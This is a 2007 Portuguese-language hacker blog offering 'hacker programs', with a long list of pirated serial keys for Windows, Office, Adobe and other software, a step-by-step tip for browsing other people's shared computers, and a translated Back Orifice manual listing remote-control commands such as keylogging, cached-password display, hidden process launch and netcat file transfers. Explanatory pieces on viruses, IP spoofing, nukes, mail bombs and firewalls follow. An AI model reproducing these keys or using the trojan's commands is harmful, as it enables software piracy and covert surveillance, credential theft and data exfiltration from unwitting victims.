HaHacker®

News HaHacker!

Olá!

Aqui no HaHacker Nos Ofereçemos Programas Hacker

De Primeira , Derrepente Vc ta Procurando um Arquivo

Aqui vc Encontra!

Espero que Goste Do Site mais antes Leia abaixo Com Atenção!

ATENÇÃO!

Invasao eh crime Aconselhamos Você a Nao Praticar Esse Ato Porque pode acabar sendo Punido Por LEI!
E Nosso Site Nao Se Responsabiliza Pelos Seus Atos!

Obrigado!

Duvida? add O Meu MSN! Se Estiver Ao Meu Alcançe o Seu Problema Te Ajudo!

morcegao_llyncoln@hotmail.com

Se Nao Quiser Add Mande-nos um E-mail!
Sem Anexo de Software Apenas de Imagem

Nossa Comunidade No Orkut Entre e Desfrute de Dicas E Muito +

http://www.orkut.com/Community.aspx?cmm=34572409

Grato!

sexta-feira, 19 de outubro de 2007

Super Listao De Seriais!

A Procural de algum Serial?
Serial de alguns programas!!

-3D Studio Max 4 :::: Number: 226
-19791979 / CD Key: XLSQBQ
-Adobe Golive 4 :::: GJW400R2100006-625
-Adobe InDesign :::: IPE123R12345678-337
-Adobe PageMaker 6.5 BR :::: 03-5004-201500745
-Adobe PageMaker 7.0 :::: 1039-1121-2998-7586-7388
-7545-Adobe Premiere 6.0 :::: MBF500B7205104-998
-Adobe Premiere 7.0 PRO:::: 1132-1381-7346-2847-2617-6783
-Aldus Photo Styler 2.0 :::: 15-1001-000000001
-Adobe Framemaker 7.0 :::: 1030-1208-8265-3458-9287-7077
-Adobe Premiere 6.0 :::: MBF500B7205104-998
-Adobe Premiere 6.5 :::: MBE600R7100024-900-960
-Adobe Premiere Pro v7.0 :::: 1132-1381-7346-2847-2617-6783
-After Effects 5.5 :::: EWW470R1001999-030-259
-Aplicativos Comerciais :::: 2003 0947201
-Architectural Desktop 3.3 SERIAL :::: 400-12345678 / CD KEY: T4ED6P
-AutoCad 14 :::: 117-99703105 / W36H / C3DF32EA
-AutoCad 2002 SERIAL :::: 400-12345678 / CD KEY: T4ED6P
-CakeWalk Home Studio 2004 :::: CWHS2.20-003021
-CakeWalk Home Studio 2002 XL :::: 2002 XL CWHX1.02-002397
-CakeWalk Pyro 2003 :::: CWPY200333333 / MP3: 95F5AGFD
-CorelDraw 8 :::: DR-8XR-23969F-63
-CorelDraw 11 :::: DR11CRD-0012082-DGW
-CorelDraw 12 :::: DR12WEX - 1504397 - KTY
-Curso - Flash 4 :::: 540234330 / 55623255258 / 5279103
-Delta Translator :::: DTR2-29108-84895-00412-18
-Dicionário Michaelis V.5.0 BR :::: CD6BL9805083
-Easy CD Creator 5.2 :::: G332NB-MGJNH-ZFVPB
-Easy CD Creator 5 :::: P-7TGQ4-G06CM-N5G1L
-Easy CD Creator 6 :::: BD-JWZS4-QX3MR-0241L
-Easy Media Creator 7.0 serial :::: YN-Y7WVY-CQXG6-K3KWZ
-Enciclopédia de Tomografia Comp. LEE :::: RUSR23351
-Empresário 3 serial :::: e3co-1-co-065-00-00-m1oe111
-English Teacher :::: 03231183
-Exchange 2000 Server :::: KRJQ8-RQ822-YRMXF-6TTXC-HD2VM
-Globalink Power Translator 6.4 :::: PT6PU7-6.41-698-0474
-Guia do Sexo :::: 3746
-Houaiss :::: DHS-21771533
-Inventor 4 :::: 202-12345678 / CD KEY: G4ED6P
-James Bond 007: NightFire :::: 1740-9488245-5171152-5578
-Jurissíntese Millenium :::: JS164-29
-Kylix 3.0 :::: 6AKT-TE29VM-7GZV6D-28?Y / Aut. Key: GFW-?RW
-Macromedia Studio MX :::: WSW600-59791-91721-99978
-Make Money 2.0 :::: PRF 0200153
-Mechanical Desktop 6.0 :::: 400-19791979 / CD-Key: TLSQBS
-Norton System Works 2005 :::: BBCQ-9BCY-PKCX-GJPD-GYTK-HKGJ
-Norton Inter Security 2005 :::: BBCY-PK26-GKCP-7BCM-VY22-3VMF
-Office 2000 :::: GC6J3-GTQ62-FP876-94FBR-D3DX8
-Office 2003 :::: GWH28-DGCMP-P6RC4-6J4MT-3HFDY
-Office XP Full BR :::: HXT2X-8CDBF-HYY8H-TYJ7Q-HMHHG
-Ominipage 11 :::: 2889A L00 500020
-Page Maker 7.0 :::: 1039-1121-2998-7586-7388-7545
-Photoshop 5.5 BR :::: PWB550E7100088-110
-Photoshop 6.0 BR :::: PWW600R7105467-948
-Photoshop 7.0 :::: 1045-1209-6738-4668-7696-2783
-Photoshop 8 CS :::: EWW470R1001999-030-259
-Photoshop Elements :::: 1057-4422-1198-0751-6983-5530
-Plus Windows :::: 95 411-1410701
-Project98 BR :::: 1112-1111111
-Project Server BR 2003 :::: WFDWY-XQXJF-RHRYG-BG7RQ-BBDHM
-QuarkXPress 5.0 :::: 39173027QHSKKJF3199PYJX2
-RoboHelp Enterprise 2002 :::: REF22-C3E40SHK
-ROXIO EASY CD & DVD CREATOR SUITE 6.0 :::: BD-JWZS4-QX3MR-0241L
-Seagate Crystal Reports 8.5 :::: A6A50-8900008-ZE1007S
-Seagete Crystal Reports 9.2 :::: AVS50-81SG00S-G61002U
-SIC 3.02 Serial :::: 12D2-2501-8410-32X0-6752 / Série: 060086
-Sound Forge 5 :::: 3B-9FWG9Z-T60ZYS-0QZY0D
-Ulead Vídeo Studio 8.0 :::: 81102-86000-13994421
-Via Voice :::: RPB000049301
-Visual Kit 5 V.6.0 :::: W60.000.001.425-789
-Visual Kit 5 V.7.0 2003 :::: U5R.IGR.567.J9L.I6K.133.9C9
-Visual SouceSafe 6.0 :::: 885-2814463
-Visual Studio 6.0 :::: 111-11111
-Visual Studio.net :::: D64GG-GXY6T-V6FTR-WCPBB-2YDYB2
-Win DVD 2000 :::: GMR22WGYXPUB8LH
-Winace :::: ACEQ79TFDSWXC3H4R64
-Windows 95 :::: 28595-OEM-0005727-80940
-Windows 98 :::: KGGJF-Q3HCX-88JJV-DM3KH-VY6VQ
-Windows 98SE :::: XJ3XX-YR4CJ-TQD6J-76QJR-GJMJB
-Windows 2000 Server BR :::: M2GHT-V6YK6-P6Q9D-PRCXF-FCWXT
-Windows 2003 BR :::: JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY
-Windows 2003 Server :::: QW32K-48T2T-3D2PJ-DXBWY-C6WRJ
-Windows ME :::: Q7JRD-HH6DG-RD4BK-H93DF-DQ4FG
-Windows ME Completo :::: B6BYC-6T7C3-4PXRW-2XKWB-GYV33
-Windows NT 4.0 :::: 419-0949015
-Windows XP Corporate :::: FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8
-Windows XP CORPORATE C/SP2 :::: VDDF2-JJWM3-X7P27-FRHRT-8BVHT
-Windows XP Home BR :::: K8GMG-PRV3M-VG2JH-DJJ48-RY7FV
-Windows XP Professional C/SP2 BR :::: BX6HT-MDJKW-H2J4X-BX67W-TVVFG
-Windows XP Professional - Inglês :::: FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8
-Windows XP BR :::: JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY
-Windows XP Server :::: BJXGH-4TG7P-F9PRP-K6FJD-JQMPM
-Windows Server 2003 Enterprise Corporate Edition :::: JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY
-Windows 2003 Standard Server :::: M6RJ9-TBJH3-9DDXM-4VX9Q-K8M8M
-Windows 2003 Web Server :::: d42x8-7mwxd-m4b76-mkyp7-cw9fd
-Windows 2003 Server Corporate 3 in 1 :::: JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY
-Windows 2003 Server/Enterprise/MSDN :::: QW32K-48T2T-3D2PJ-DXBWY-C6WRJ

Ta Tudo Ai Procura Que Voçê acha!

terça-feira, 16 de outubro de 2007

Ambientes de Rede...

REDE

Esta não é um invasão, se quiser saber sobre isto, clique aqui

Para instalar Ambiente de Rede em seu computador, siga os passos abaixo:

Entre em Painel de Controle - Rede
Adicione os seguinte componentes:
Cliente - Microsoft - Cliente para rede microsoft
Protocolo - Microsoft - NetBEUI
Protocolo - Microsoft - IPX/SPX
Protocolo - Microsoft - TCP/IP
Serviço - Microsoft - Compartilhamento de arquivos e impressoras para rede Microsoft
Selecione o compartilhamento de arquivos ou impressora (Um tem que estar compartilhado)

Atenção - Não remova nenhum componente que estava antes entendeu??? Nenhum... só adicione...

Agora é só reiniciar o computador... e pronto... entre no Ambiente de Rede e comece a fuçar no computador dos outros...

Se você quiser compartilhar alguma coisa... basta clicar com o botão direito em cima da pasta/diretório e entrar em compartilhamento...

Manual do BO...

Manual do BO
--------------------------------------------------------------------------------

cult of the dead cow communications apresenta back orifice
sistema de administração remota
v1.20 30/07/98
lançamento

o back orifice é um aplicativo cliente/servidor que permite ao cliente
monitorar, administrar e realizar outras ações de rede e multimídia na máquina
rodando o servidor. para se comunicar com o servidor, o cliente (modo texto ou
gráfico) pode ser utado a partir de qualquer máquina baseada em microsoft
windows. o servidor atualmente só roda em windows 95/98.

o pacote bo120.zip contém:
bo.txt

este documento.
plugin.txt

a ajuda para programação de plugin.
boserve.exe

o auto-instalador do back orifice (bo).
bogui.exe

o cliente modo gráfico (gui) do back orifice.
boclient.exe

o cliente modo texto do back orifice.
boconfig.exe

utilitário de configuração de nome do utável, porta, senha e plugins do
servidor bo.
melt.exe

descompacta arquivos compactados com o comando "freeze".
freeze.exe

compacta arquivos que podem ser descompactados com o comando "melt".
melt.exe

para instalar o servidor, é necessário apenas utá-lo. quando o servidor é
utado, ele se instala e se apaga. uma vez instalado em uma máquina, ele
iniciará sempre que a máquina iniciar.

para atualizar uma cópia do back orifice remotamente, faça upload da nova versão
do servidor para a máquina remota, e use o comando "process spawn" para utá-
la. quando utado, o servidor irá automaticamente se instalar no lugar da
antiga versão, se apagando após a operação.

antes da instalação, vários aspectos do servidor podem ser configurados com o
utilitário "boconfig": o nome do arquivo em que o back orifice se instalará, a
porta em que o servidor pode ser acessado e a senha de acesso. se o servidor
não for configurado, ele será acessado na porta 31337, sem senha e se instalando
como " .exe" (espaço ponto exe).

o cliente se comunica com o servidor através de pacotes udp encriptados. para
que se comuniquem, o cliente deve enviar os pacotes para mesma porta que o
servidor estiver recebendo, e a senha do cliente deve coincidir com a senha do
servidor.

a porta na qual o cliente envia os pacotes pode ser configurada através do
parâmetro -p (gui ou modo texto). se o acesso estiver sendo filtrado ou um
"firewall" estiver rodando, pode ser necessário enviá-los por uma porta
específica, que não esteja sendo filtrada ou bloqueada.
o servidor realiza ações através do envio de comandos do cliente para um
endereço ip específico. se a máquina servidor não estiver sob um endereço
estático, ela pode ser localizada utilizando-se os comandos de varredura "sweep"
ou "sweeplist" do cliente modo texto, e no gui através do comando "ping..." ou
entrando-se com um ip na forma "1.2.3.*".

os comandos atualmente incorporados ao back orifice estão listados abaixo.
alguns dos nomes diferem entre o gui e o modo texto, mas a sintaxe é a mesma
para a maioria dos comandos. mais informações sobre qualquer dos comandos podem
ser exibidas através do cliente modo texto digitando-se "help command". o
cliente gui usa os dois campos de parâmetro para descrever as variáveis
requeridas por cada comando selecionado da lista "command". se parte da
informação requerida pelo comando não for fornecida, o erro "missing data" será
enviado pelo servidor.
os comandos do back orifice são:

(gui/comando texto)

app add/appadd
abre e redireciona um aplicativo modo texto para uma porta tcp. isso permite
que você controle o aplicativo modo texto ou modo dos (como command.com) via
telnet.

app del/appdel
desliga o redirecionamento de um aplicativo.

apps list/applist
lista os aplicativos atualmente conectados.

directory create/md
cria diretório.

directory list/dir
lista arquivos e diretórios. você deve especificar um curinga caso queira que
mais de um arquivo seja listado.

directory remove/rd
remove um diretório.

export add/shareadd
compartilha um diretório ou drive do servidor em rede. o ícone diretório ou
drive compartilhado não é ado.

export /sharedel
remove um compartilhamento.

exports list/sharelist
lista os compartilhamentos, o drive ou diretório que está sendo compartilhado,
os acessos e a senha do compartilhamento.

file copy/copy
copia um arquivo.

file /del
remove um arquivo.

file find/find
procura no diretório arquivos que coincidam com a especificação curinga.

file freeze/freeze
compacta um arquivo.

file melt/melt
descompacta um arquivo.

file view/view
visualiza o conteúdo de um documento texto.

http disable/httpoff
desabilita o servidor http.

http enable/httpon
habilita o servidor http.

keylog begin/keylog
registra o texto digitado no servidor em um arquivo texto. o log mostra o nome
da janela em que o texto foi digitado.

keylog end
interrompe o registro de texto digitado. para utilizar esse comando no modo
texto, use o comando "keylog stop".

mm capture avi/capavi
captura vídeo e áudio (se disponível) de um dispositivo de captura de vídeo para um arquivo avi.

mm capture frame/capframe
captura um quadro de vídeo de um dispositivo de captura de vídeo para um arquivo
bitmap.

mm capture screen/capscreen
captura uma imagem da tela do servidor para um arquivo bitmap.

mm list capture devices/listcaps
lista os dispositivos de captura de vídeo.

mm play sound/sound
toca um arquivo wav no servidor.

net connections/netlist
lista as conexões de entrada e saída da rede.

net /netdisconnect
desconecta o servidor de uma rede.

net use/netconnect
conecta o servidor em uma rede.

net view/netview
lista todas as interfaces de rede, domínios, servidores e envios do servidor.

ping host/ping
testa a conexão com a máquina remota. informa o nome da máquina e a versão do
bo.

plugin ute/plugin
uta um plugin do back orifice. utar funções não entendidas pelo plugin
pode fazer com que o servidor trave.

plugin kill/pluginkill
desliga um plugin.

plugins list/pluginlist
lista plugins ativos ou avisa de que um plugin foi desligado.

process kill/prockill
termina um processo.

process list/proclist
lista processos rodando.

process spawn/procspawn
abre um programa. pelo gui, se o segundo parâmetro é especificado, o processo
será utado normalmente e visível. caso contrário ele será utado de
maneira invisível.

redir add/rediradd
redireciona recebimento de conexões tcp ou pacotes udp para outro endereço ip.

redir del/redirdel
interrompe o redirecionamento de uma porta.

redir list/redirlist
lista os redirecionamentos de portas ativos.

reg create key/regmakekey
cria uma chave no registro.
nota: para todos os comandos de registro, não especificar a \ inicial de
valores de registro.

reg key/regdelkey
remove uma chave no registro.

reg value/regdelval
remove um valor no registro.

reg list keys/reglistkeys
lista as sub-chaves de uma chave de registro.

reg list /reglistvals
lista os valores de uma chave de registro.

reg set value/regsetval
define um valor para uma chave de registro. os valores são especificados no
formato tipo vírgula valor. para valores binários (tipo b) o valor é um série
de dois dígitos hexadecimais. para valores dword (tipo d) o valor é um número
decimal. para valores string (tipo s) o valor é uma string de texto.
resolve host/resolve
determina o endereço ip de uma máquina em relação à máquina servidor. o nome da
máquina pode ser um "host name" ou o nome de uma máquina em rede local.

system dialogbox/dialog
cria uma caixa de diálogo no servidor com o texto informado e um botão "ok".
você pode criar quantas caixas de diálogo quiser, elas aparecerão em cascata
umas sobre as outras.

system info/info
exibe as informações do sistema da máquina servidor. os dados exibidos incluem
nome da máquina, usuário, tipo de cpu, memória total e disponível, dados sobre a
versão de windows e informações sobre os drives, incluindo tipo (fixo, cd-rom,
removível ou remoto) e, nos drives fixos, o tamanho e espaço disponível do drive.

system lockup/lockup
trava a máquina servidor.

system passwords/passes
exibe as senhas cacheadas e a senha do protetor de tela. as senhas podem
apresentar caracteres estranhos no fim.

system reboot/reboot
desliga o servidor e reinicia a máquina.

tcp file receive/tcprecv
conecta o servidor a um ip e porta específicos e grava qualquer dado recebido
por aquela conexão em um arquivo.

tcp file send/tcpsend
conecta o servidor a um ip e porta específicos, envia o conteúdo do arquivo
especificado e o desconecta.
arquivos podem ser transferidos _do_ servidor usando-se o comando "tcp file
send" e o utilitário netcat com os parâmetros:
netcat -l -p 666 > arquivo
arquivos podem ser transferidos _para_ o servidor usando-se o comando "tcp file
receive" e o utilitário netcat com os parâmetros:
netcat -l -p 666 < arquivo

nota: a versão para windows do netcat não desconcerta nem se finaliza quando
atinge o final da transmissão. após o término, finalize o netcat com ctrl+c ou
ctrl+break.
envie suas dúvidas, comentários e reclamações (em inglês) para bo@cultdeadcow.com.


http://www.cultdeadcow.com
microsoft®, windows®, windows 95®, windows 98®, and windows nt® são marcas
registradas da microsoft corporation.

Oque é vírus...

quem tem, na ponta da língua, a explicação do que é, exatamente, um vírus? já lemos milhares de explicações sobre vírus, mas em quase todas ficaram faltando o essencial: o que eles são?

vírus são programas. todos eles. no tipo mais comum de vírus eles são programas muito pequenos e invisíveis. o computador (ou melhor dizendo, o sistema operacional), por si só, não tem como detectar a existência deste programinha. ele não é referenciado em nenhuma parte dos seus arquivos, ninguém sabe dele, e ele não costuma se mostrar antes do ataque fatal. em linhas gerais, um vírus completo (entenda-se por completo o vírus que usa todas as formas possíveis de contaminar e se ocultar) chega até a memória do computador de duas formas.

a primeira e a mais simples é a seguinte: em qualquer disco (tanto diskette quanto hd) existe um setor que é lido primeiro pelo sistema operacional quando o computador o acessa. este setor identifica o disco e informa como o sistema operacional (so) deve agir. o vírus se aloja exatamente neste setor, e espera que o computador o acesse.

a partir daí ele passa para a memória do computador e entra na segunda fase da infecção. mas antes de falarmos da segunda fase, vamos analisar o segundo método de infecção: o vírus se agrega a um arquivo utável (fica pendurado mesmo nesse arquivo!). acessar o disco onde este arquivo está não é o suficiente para se contaminar. É preciso utar o arquivo contaminado. o vírus se anexa, geralmente, em uma parte do arquivo onde não interfira no seu funcionamento (do arquivo), pois assim o usuário não vai perceber nenhuma ação e vai continuar usando o programa infectado.

o vírus, após ter sido utado, fica escondido agora na memória do computador, e imediatamente infecta todos os discos que estão ligados ao computador, colocando uma cópia de si mesmo no tal setor que é lido primeiro (chamado setor de boot), e quando o disco for transferido para outro computador, este ao acessar o disco contaminado (lendo o setor de boot), utará o vírus e o alocará na sua memória, o que por sua vez irá infectar todos os discos utilizados neste computador, e assim o vírus vai se alastrando.

os vírus que se anexam a arquivos infectam também todos os arquivos que estão sendo ou que serão utados. alguns às vezes re-contaminam o mesmo arquivo tantas vezes e ele fica tão grande que passa a ocupar um espaço considerável (que é sempre muito precioso) em seu disco. outros, mais inteligentes, se escondem entre os espaços do programa original, para não dar a menor pista de sua existência.

cada vírus possui um critério para começar o ataque propriamente dito, onde os arquivos começam a ser apagados, o micro começa a travar, documentos que não são salvos e várias outras tragédias. alguns apenas mostram mensagens chatas, outros mais elaborados fazem estragos muitos grandes (diz a lenda que existe um vírus que, ao iniciar o ataque, é mostrado na tela uma foto de uma mulher, que começa a fazer um striptease, e cada peça de roupa que ela tira, é um pedaço do seu disco que é sumariamente apagado). geralmente atacam por data. o mais famoso é o sexta-feira 13. mas existem outras datas que são muito temidas pelos especialistas em vírus, tal como o chernobil (win.cih), dia 26 de todos os meses, e mais maldoso dia 26 de abril.

a maior parte dos softwares anti-vírus possui um catálogo detalhado de cada vírus e suas variações, com seus métodos de contaminação, estragos que provocam, etc.

uma outra espécie de vírus, chamados de "vírus de macro", não contaminam arquivos utáveis, mas sim documentos de aplicativos que possuem linguagem de programação, como o word, da microsoft. nestes aplicativos, é possível escrever programinhas para automatizar uma série de tarefas, e os vírus consistem em programas que am as características do aplicativo, retirando opções dos menus, salvando arquivos vazios ou com nomes errados, etc. mesmo estes vírus, que se escondem dentro de documentos, precisam ser abertos (ou lidos) no aplicativo que o criou para que a contaminação seja feita. após contaminado, o aplicativo faz uma cópia do vírus para todos os documentos abertos após a contaminação, alastrando ainda mais o problema. dependendo do grau de "liberdade" que a linguagem macro contida nestes aplicativos possui, um vírus de macro pode até mesmo apagar todos os seus arquivos. os anti-vírus mais novos detectam e corrigem arquivos com estes vírus.

...Trojans E Horses...

< cellspacing="0" cellpadding="4" width="85%" align="center" border="0">

<>fique ligado!

backdoor-g
mais um trojan que pode por em risco seus arquivos pessoais, disponibilizando uma porta de entrada para invasores!

netbus 2.0
o já aclamado backdoor ganha uma versão fantástica e perigosa! ficou muito mais fácil para "qualquer mané" fazer misérias no seu computador. cuidado!

higienic paper 3.0
nova versão do já famoso anti-trojan nacional! agora, além de eliminar e vacinar seu computador, ele monitora as portas de conexão do bo e netbus!

picture.exe
mais um "cavalo de tróia" que pode estar infectando seu computador. pegue sua vacina e certifique-se de estar livre dele!

sockets de troie
uma poderosa ferramenta de invasão, que na sua última versão, contamina outros arquivos do sistema. um híbrido entre vírus e cavalo de tróia!

atenção: os arquivos disponibilizados aqui são de responsabilidade dos seus criadores, citados nos créditos de cada página. o soul hacker não responde por qualquer dano, proposital ou não, causado ao seu computador por conseqüência da utilização dos programas acima.

Ataque IpSpooFing

entenda o ataque ip spoofing

< cellspacing="0" cellpadding="0" width="100%" border="0">
o ip spoofing ficou famoso após ter sido a atração principal do ataque à rede de tsutomu shimomura, um dos maiores especialistas de segurança dos estados unidos, quando através dele, na noite de natal de 1994, o mais famoso e procurado hacker americano, kevin mitnick, invadiu a sua rede particular e roubou alguns dos seus programas, dentre eles, um software de programação dos celulares oki, que lhe permitiria ter um controle total sobre suas ligações clandestinas e escutas de celulares.

esta história, é claro, foi desmentida por kevin, que apesar do sabido interesse no referido telefone, não demonstrava aptidão suficiente para realizar um ataque desta grandeza. apesar deste tipo de ataque ter sido teorizado há muitos anos, somente na metade desta década ele ficou mundialmente conhecido e, em 1997 já era o 4° método de invasão mais utilizado. hoje encontram-se ferramentas que automatizam esta fatigante tarefa, e tem-se conhecimento de ataques de spoofing concretizados em menos de meio minuto!

disfarce. É isto que este ataque faz. muitas comunicações entre computadores na internet se baseiam em "parceiros" confiáveis. um computador x pode manter uma comunicação com um computador y de forma que não seja necessária a constante verificação de autenticidade entre eles. o hacker, então, se disfarça, dizendo para o computador x que "ele" é o computador y. desta forma o computador x vai aceitar seus comandos tranqüilamente, enquanto ele deita e rola pelo sistema.

um pouco mais de detalhes: os pacotes ip possuem um endereço destino e um endereço origem. normalmente o endereço origem reflete a realidade, mas nada impede que um hacker e este pacote para que ele pareça ter vindo de outro lugar. só que não é tão simples assim... além de enganar o destino, neste caso o computador x, é necessário que se sobrecarregue o computador y, para que ele não responda às mensagens de x, o que faria com que y dissesse: "mas eu não te perguntei nada!", e x cancelaria a conexão.

faz-se necessária, ainda, uma "previsão" do número de seqüência mandado por x. este número é enviado por x ao originador da conexão (supostamente o y). mas y não irá responder, devido à sobrecarga explicada anteriormente. então o hacker deve prever o número de seqüência mandado por x para que seja enviado um novo pacote com estes números de seqüência, fingindo novamente ter sido enviado por y, e forjando a autenticação.

a previsão deste número de seqüência é um processo demorado e criativo. durante a negociação da conexão, os computadores trocam informações para efetuarem o "handshake" ou "aperto de mão". dentre as informações trocadas estão os números de seqüência, que devem ser repetidos para o destino, para que este se certifique da autenticidade da conexão. o que o hacker pode fazer é o seguinte: enviar, através de um pacote legítimo, com o endereço de origem verdadeiro, vários pedidos de conexão à x. este responde com um número de seqüência para que o hacker o repita e efetue a conexão, mas a máquina de origem (o hacker) não tem privilégios e não lhe interessa fechar esta conexão. então ele não responde a estes pacotes de x, apenas os guarda e verifica seu número de seqüência.

após vários pedidos de conexão com x, o hacker pode "aprender" como x gera seus números e então mandar um pedido de conexão, desta vez com o endereço de origem sendo y (o computador confiável). obviamente, o hacker não vai receber os pacotes de x com os números de seqüência, pois estes irão para o endereço de origem (computador y, que, a esta altura, precisa estar sobrecarregado para não repondê-los), mas, com base nos cálculos anteriores, o hacker prevê e manda o número de seqüência correto para o computador x, fechando a conexão.



esta conexão é unidirecional, pois todas as respostas de x serão destinadas ao computador y, e não ao computador do hacker. então o hacker age "às cegas", pois não recebe nenhum tipo de retorno de x, pelo menos enquanto configura x para aceitar conexões do seu próprio computador. ao terminar, o hacker tira o disfarce: desfaz a conexão falsa com x, e faz uma legítima, agora que x pode aceitar conexões confiáveis através do computador do hacker, com todos os privilégios possíveis e imagináveis.

há dois inconvenientes neste ataque: o trabalho de achar um padrão nos números de seqüência e a falta de retorno do computador invadido. entretanto, existe ainda uma outra categoria de spoofing, que, apesar das condições pouco comuns, é muito mais eficiente. neste tipo de ataque, um computador de pouca importância em uma rede é invadido por um método simples qualquer (infelizmente, os computadores que não guardam informações importantes geralmente são esquecidos no projeto de segurança) e, estando localizado no mesmo meio físico onde ocorre uma comunicação entre duas máquinas importantes, ele poderá "captar" todo o tráfego deste meio físico. com isso ele saberá os números de seqüência de ambos os lados, podendo interceptar este diálogo, pondo-se no lugar de um dos computadores da conexão confiável, tendo total acesso aos dados mais sigilosos.

este tipo de ataque só pode ser eficazmente prevenido através de um controle apurado de todos os computadores da rede local, que compartilham o mesmo meio físico, ou através de uma comunicação confiável baseada em aplicativos de criptografia.

Tipos de Ameaças...

o simples fato de estar conectado à internet implica em uma série de possibilidades de atentado à sua segurança. entre as principais ameaças estão:

redes corporativas: disponibilizar serviços internet em uma rede corporativa pode abrir diversos furos de segurança, permitindo que recursos ou informações da empresa sejam acessados de forma indevida por estranhos.

servidores: a ameaça de ação nas informações de servidores pode ser mortalmente prejudicial para uma empresa. por exemplo, a modificação da especificação de algum produto em um servidor da web pode fazer com que inúmeros negócios sejam perdidos.

transmissão: Às vezes pode não ser necessário uma invasão de servidores ou redes. É possível violar a transmissão da informação pela internet, interceptando-se mensagens, arquivos, senhas etc.

interrompimento: um serviço pode ser atacado de uma maneira menos sutil, mas nem por isso menos perigosa. pode-se, simplesmente, fazer com que o serviço "caia", deixe de funcionar, e que todos os seus usuários legítimos fiquem inacessíveis.

negação: em transações pela internet, ainda temos um outro problema a solucionar. negar a participação em uma negociação digital também pode ser considerada um ataque ao seu correto funcionamento.

Lista de NUKES

denial of services e nukes

nukes e denial of services são táticas que exploram falhas lógicas em programas e protocolos de comunicação (algumas vezes conceituais) que, na maioria das vezes causam problemas no seu funcionamento. a lista abaixo contém os mais famosos nukes da internet. os mais recentes aparecem em primeiro, e os mais antigos, mas nem por isso menos importantes, estão no final.


--------------------------------------------------------------------------------

< cellspacing="0" cellpadding="7" width="100%" border="0">

smb
família:
server message block (smb)
vítima(s):
windows nt
efeito:
sistema trava ou reinicializa
mais sobre:
microsoft help page bonk
família:
boink, newtear, tear 2
vítima(s):
windows 95, windows nt
efeito:
tela azul de erro; travamento
mais sobre:
microsoft bulletin
land
vítima(s):
windows 95, nt, 3.11, outros
efeito:
travamento total
mais sobre:
wired news tear
família:
tear, tcp/ip fragment bug
vítima(s):
windows 95, nt, 3.11
efeito:
reboot; travamento
mais sobre:
windows central.
click
família:
icmp nuke, icmp unreachable
vítima(s):
conexões irc
efeito:
conection reset by peer
mais sobre:
ver abaixo * ssping
família:
jolt, sping, ping od death
vítima(s):
windows 95, nt e outros
efeito:
travamento
mais sobre:
windows central ; windows95.com
winnuke
família:
oob (out of band) bug
vítima(s):
windows 95, nt, 3.11
efeito:
tela azul de erro; travamento
mais sobre:
windows central; windows95.com icmp flood
família:
ping flood
vítima(s):
qualquer conexão
efeito:
sobrecarga; desconexão
mais sobre:
ver abaixo **
smurf
vítima(s):
provedores e servidores
efeito:
sobrecarga no sistema inteiro;
desconexão em massa; lentidão
mais sobre:
windows central ; craig huegen
* - possível escapada para o click:
digite /motd e veja quais as portas do servidor. não utilize as portas mais comuns (6667, p.ex.) experimente com outros servidores da rede. os que possuem filtros aliviarão o problema. ** - os problemas do icmp flood:
não existe solução no momento para este problema, pois este ataque explora a baixa capacidade dos nossos modens. somente um firewall instalado no seu provedor poderá impedir este ataque. (firewalls pessoais não protegerão você dos problemas do icmp flood)

Mail Bomb's...

seguindo o primeiro pensamento que nos vem à cabeça quando falamos de mailbomb, os vírus, podemos lembrar que, não sendo por meio de disquete contaminado, um vírus só pode causar algum mal se for utado (tanto os normais quanto os de macro). esta hipótese de vírus está descartada dos mailbombs.

até porque um e-mail que contenha um arquivo anexado é perigoso, pois pode conter um vírus, mas se você apagar este arquivo ou passar um anti-vírus nele o problema estará resolvido.

portanto, que diabos é esse negócio de mail-bomb? a mensagem explode? não. a mensagem é apenas texto, e texto não é utado, ou seja, não pode utar nenhuma ação no computador.

o problema do mail-bomb geralmente não é seu, mas sim do seu provedor. o negócio é o seguinte: cada usuário de um provedor de internet possui um espaço limitado na caixa postal para receber mensagens. o bomb se refere à "estourar" o espaço que lhe destina no seu provedor e, assim, o provedor, com sua caixa postal entupida de mensagens, começa a rejeitar mensagens novas destinadas a você, até que você retire suas mensagens e esvazie sua caixa postal.

o processo de mail-bomb é exatamente isso: várias mensagens repetidas, geralmente contendo um texto malcriado, que abarrotam seu e-mail e impede que você receba mais mensagens, o que pode ser muito prejudicial para algumas pessoas com negócios importantes que dependem de correio eletrônico.

os bons programas leitores de e-mail possuem a capacidade de lhe mostrar apenas o subject, o tamanho e o remetente das mensagens que estão lhe esperando no provedor. a partir daí você pode escolher qual você quer trazer para seu computador, qual você quer apagar do servidor, ou ambos. isto é muito útil para se prevenir de "baixar" milhares de mensagens que só serviriam para ocupar seu tempo.

consulte periodicamente sua caixa postal para certificar-se de que ela não está muito cheia e cuidado com os tipos de pessoas para quem você dá seu e-mail.

alguns provedores possuem mecanismos "anti-mail-bombs" (sinceramente, não sabemos até que ponto isto é seguro, ou útil), assim como os serviços de caixa-postal virtual, por exemplo o pobox.

Conheçimento FIREWALL...

firewalls - conceitos básicos [1 de 2]

< cellspacing="0" cellpadding="0" width="100%" border="0">
uma das grandes preocupações na área de segurança de redes é a vulnerabilidade de um computador, que pode comprometer as transmissões pelo meio físico da rede na qual está ligado. muito se tem feito para que o host (equipamento computacional) esteja seguro isoladamente, impedindo o acesso indevido a seus dados e monitorando qualquer tentativa de invasão. entretanto, um outro método tem se mostrado bastante eficiente: impedir que informações indesejadas entrem na rede como um todo.

não é um método substituto à segurança do host, mas complementar, e consiste no seguinte: na ligação da rede interna com a internet, instala-se um equipamento que permitirá, ou não, a entrada e saída de informação, baseado em uma lista de restrições e permissões, devidamente configurada para suprir as necessidades básicas de comunicação da rede interna com a internet e vice-versa. nem mais, nem menos. esta configuração é a chave do sucesso ou fracasso de um firewall.

É importante lembrar que o firewall deve estar presente em todas as conexões da rede interna com a internet. não adianta nada colocar um firewall super sofisticado na ligação do backbone se, dentro da rede interna, existir um micro com um modem conectado em outra rede...


em tempo: firewall não é "parede contra fogo", como muitos dizem, e sim "parede de fogo", feita para impedir a passagem de alguém (ou de algo). mas isso é só um detalhe... tem gente que ainda chama cd-rom de cd-room... ;-)

